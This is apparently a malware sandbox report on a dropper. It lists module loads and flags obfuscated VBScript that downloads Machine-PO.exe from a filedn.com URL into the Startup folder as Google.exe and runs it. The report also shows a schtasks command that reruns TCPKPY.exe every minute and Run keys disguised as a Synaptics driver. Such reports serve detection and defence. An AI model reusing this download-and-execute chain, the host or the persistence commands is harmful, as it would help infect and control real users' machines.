                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                            Source: UAINOJ.lnk.4.drLNK file: ..\..\..\..\..\Windata\TCPKPY.exe
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\9iLoUuX.iniJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                            Data Obfuscation

                            barindex
                            VBScript performs obfuscated calls to suspicious functions
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe")
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005120F6 LoadLibraryA,GetProcAddress,4_2_005120F6
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D7795 push ecx; ret 4_2_004D77A8
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB68CF push 6AC07751h; retf 7_2_04CB68DA
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB8CEB push 8EE07751h; retf 7_2_04CB8CFA
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CA4CA9 push esp; retf 0004h7_2_04CA4CAA
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB44AF push 46A07751h; retf 7_2_04CB44BA
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CA3014 pushad ; ret 7_2_04CA3015
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB45DF push ecx; retf 7_2_04CB463A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB69E7 pushad ; retf 7_2_04CB69EE
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB4593 push ecx; retf 7_2_04CB463A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB45AB push ecx; retf 7_2_04CB45B6
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB45AB push ecx; retf 7_2_04CB463A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB55A3 push edi; retf 7_2_04CB55AA
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB55B3 push edi; retf 7_2_04CB5662
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB0D6B push cs; retf 7_2_04CB0D72
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB4563 push ecx; retf 7_2_04CB4566
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB5167 push ecx; retf 7_2_04CB516A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CA157B push ss; retf 0004h7_2_04CA1582
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB5173 push edi; retf 7_2_04CB517A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB0D73 push cs; retf 7_2_04CB0E22
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CBB10C push B3007751h; retf 7_2_04CBB11A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CA6D07 pushad ; retf 0004h7_2_04CA6D0E
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB091B push cs; retf 7_2_04CB0926
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CBD52B push D7207751h; retf 7_2_04CBD53A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB0927 push cs; retf 7_2_04CB0932
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB0933 push cs; retf 7_2_04CB093A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB56CF push 58B07751h; retf 7_2_04CB56CA
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB56CF push edi; retf 7_2_04CB56FA
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB56CF push edi; retf 7_2_04CB5742
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB9EFF push A0F07751h; retf 7_2_04CB9F0A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CA5AF7 push eax; retf 0004h7_2_04CA5AFE
                            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 7_2_04CB0E8B push cs; retf 7_2_04CB0EBA

                            Persistence and Installation Behavior

                            barindex
                            Drops PE files to the document folder of the user
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\IPKGELNTQY\~$cache1Jump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\LSBIHQFDVT\~$cache1Jump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeJump to dropped file
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\IPKGELNTQY\~$cache1Jump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Local\Temp\._cache_Google.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\RCX4FAD.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeFile created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeJump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\LSBIHQFDVT\~$cache1Jump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\RCX4FAD.tmpJump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\IPKGELNTQY\~$cache1Jump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\LSBIHQFDVT\~$cache1Jump to dropped file

                            Boot Survival

                            barindex
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UAINOJJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                            Drops PE files to the startup folder
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeJump to dropped file
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to dropped file
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnkJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
